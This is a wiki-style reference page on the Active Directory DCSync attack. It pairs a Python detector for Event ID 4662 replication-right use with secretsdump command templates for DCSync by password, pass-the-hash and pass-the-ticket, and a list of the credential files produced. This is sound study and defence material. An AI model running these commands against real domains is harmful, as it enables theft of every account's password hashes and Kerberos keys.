# DCSync

## Overview

A DCSync is similar to dumping the NTDS.dit file. However, rather than copying NTDS.dit and extracting data from it, DCSync uses Windows APIs to ask the domain controller to replicate the domain's data.

To conduct this attack, a domain administrator account is required, or a user holding the `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` privileges.
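Because a DCSync exercises exactly these replication rights, the defender's counterpart is to watch for them being used by anything other than a domain controller. The following Python is an added example, not part of the original page: it scans Event ID 4662 records (here constructed in a flat key=value form) and flags those where the Properties field carries the replication-right GUIDs but the subject account is not on an allow-list of known replicators. The account names and the allow-list are constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# Extended-rights GUIDs that appear in the Properties field of Event ID 4662
# when a principal reads replication data; a DCSync needs both of these.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

# Accounts expected to replicate (constructed: the domain's DC computer accounts).
ALLOWED_REPLICATORS = {"DC01$", "DC02$"}

# Constructed sample events in a flat key=value form, not real log output.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ SubjectDomainName=CORP ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jsmith SubjectDomainName=CORP ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jsmith SubjectDomainName=CORP ObjectType=user "
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624 SubjectUserName=jsmith SubjectDomainName=CORP LogonType=3",
]

def parse_event(line: str) -> Dict[str, str]:
    """Split a key=value line; Properties may hold several {GUID} tokens."""
    pattern = r"(\w+)=(\{[^}]*\}(?:\s*\{[^}]*\})*|\S+)"
    return dict(re.findall(pattern, line))

def replication_rights_used(event: Dict[str, str]) -> List[str]:
    """Names of the replication rights present in the event's Properties."""
    props = event.get("Properties", "").lower()
    return sorted(n for g, n in REPLICATION_RIGHTS.items() if g in props)

def is_suspect_dcsync(event: Dict[str, str], allowed: set) -> bool:
    """4662 carrying replication rights from a principal not known to replicate."""
    if event.get("EventID") != "4662" or not replication_rights_used(event):
        return False
    return event.get("SubjectUserName", "").upper() not in {a.upper() for a in allowed}

def find_suspect_dcsyncs(lines: List[str], allowed: set) -> List[Tuple[str, List[str]]]:
    """Return (account, rights) for every event that looks like a DCSync."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if is_suspect_dcsync(event, allowed):
            alerts.append((event["SubjectUserName"], replication_rights_used(event)))
    return alerts
```

Event 4662 is only written when Directory Service Access auditing is enabled and the domain object's SACL covers these rights, so confirm the audit policy before relying on this signal.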

## Remotely performing a DCSync

The easiest way to perform a DCSync remotely is to use secretsdump.

secretsdump.py implements various techniques for dumping password hashes and secrets.

* <https://github.com/fortra/impacket/blob/master/examples/secretsdump.py>

**DCSync using a plaintext password**

`secretsdump -outputfile 'data' <DOMAIN>/<USER>:<PASSWORD>@<DOMAINCONTROLLER>`

**DCSync using Pass-the-Hash**

`secretsdump -outputfile 'data' -hashes <LMhash>:<NThash> <DOMAIN>/<USER>@<DOMAINCONTROLLER>`

**DCSync using Pass-the-Ticket**

`secretsdump -k -no-pass -outputfile 'data' <DOMAIN>/<USER>@<DOMAINCONTROLLER>`

With `-k`, the ticket is read from the credential cache named in the `KRB5CCNAME` environment variable; `-no-pass` stops the script from prompting for a password.

## secretsdump output

The secretsdump script writes the following files, prefixed with the `-outputfile` name, from the DCSync:

* .ntds
  * LM and NT password hashes, which can be used for hash cracking.
* .cleartext
  * Passwords stored using reversible encryption.
* .kerberos
  * Kerberos keys (DES, AES128 and AES256).
* .sam
  * The domain controller's SAM secrets.
* .secrets
  * The domain controller's LSA secrets.
